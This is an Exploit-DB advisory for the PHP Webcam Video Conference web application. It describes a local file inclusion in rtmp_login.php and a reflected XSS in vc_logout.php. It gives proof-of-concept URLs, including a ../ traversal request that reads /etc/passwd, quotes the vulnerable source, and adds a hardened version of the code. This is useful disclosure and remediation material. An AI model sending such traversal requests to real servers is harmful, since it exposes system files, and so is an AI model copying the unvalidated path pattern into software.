PHP Webcam Video Conference - Multiple Vulnerabilities
Author: vinicius777
type: webapps
platform: php
port: 80.0
date_added: 2014-02-06
date_updated: 2014-02-06
verified: 1
codes: OSVDB-103017;OSVDB-103016
tags:
aliases:
screenshot_url: http://www.exploit-db.com/screenshots/idlt31500/screen-shot-2014-02-06-at-55339-pm.png
application_url: http://www.exploit-db.comvc_php.zip
# Exploit: PHP Webcam Video Conference - LFI/XSS
# Date: 06/02/2014
# Exploit Author: vinicius777
# Contact: vinicius777 [AT] gmail / @vinicius777_
# Vendor Homepage: http://www.videowhisper.com/
# Software Link: http://sourceforge.net/projects/phpwebcamvideoconference
# Solution: Upgrade to the new version on the videowhisper vendor homepage.
[1] Local File Include - rtmp_login.php
P0C: http://192.168.1.7/vc_php/rtmp_login.php?s=../../../../../etc/passwd
[+] rtmp_login.php
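<?php
// Session name is taken directly from the query string, with no validation.
$session = $_GET['s'];
// Vulnerable: "../" sequences in $session escape uploads/_sessions/.
$filename1 = "uploads/_sessions/$session";
if (file_exists($filename1))
{
    // Any file readable by the web server is echoed back to the client.
    echo implode('', file($filename1));
}
else
{
    echo "VideoWhisper=1&login=0";
}
?>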
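A hardened form of the session lookup above, as an added example that is not the vendor's fix or code from the original advisory. It assumes session names are short alphanumeric tokens; SESSION_DIR and resolve_session_file() are hypothetical names introduced here.

```php
<?php
// Added example, not vendor code. SESSION_DIR and resolve_session_file()
// are hypothetical names; the allowed character set is an assumption.
const SESSION_DIR = __DIR__ . '/uploads/_sessions';

/**
 * Map a client-supplied session name to a file inside SESSION_DIR.
 * Returns null when the name is malformed or resolves outside the directory.
 */
function resolve_session_file(string $session): ?string
{
    // 1. Allow-list: no slashes, dots, NUL bytes or other path syntax.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $session)) {
        return null;
    }

    // 2. Canonicalise both paths; realpath() resolves ".." and symlinks
    //    and returns false when the target does not exist.
    $base = realpath(SESSION_DIR);
    $path = realpath(SESSION_DIR . DIRECTORY_SEPARATOR . $session);
    if ($base === false || $path === false) {
        return null;
    }

    // 3. Containment: the resolved target must be a regular file that sits
    //    directly in the session directory (catches symlinked entries too).
    if (dirname($path) !== $base || !is_file($path)) {
        return null;
    }
    return $path;
}

// ?s[]=x makes $_GET['s'] an array, so check the type before use.
$session = $_GET['s'] ?? '';
$file = is_string($session) ? resolve_session_file($session) : null;

if ($file !== null) {
    readfile($file);
} else {
    // Same negative response as the original script.
    echo "VideoWhisper=1&login=0";
}
```

With this check the request shown in the P0C line fails at step 1 and receives the same negative response as an unknown session.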
[2] XSS Reflected
P0C = http://192.168.1.7/vc_php/vc_logout.php?message=[XSS]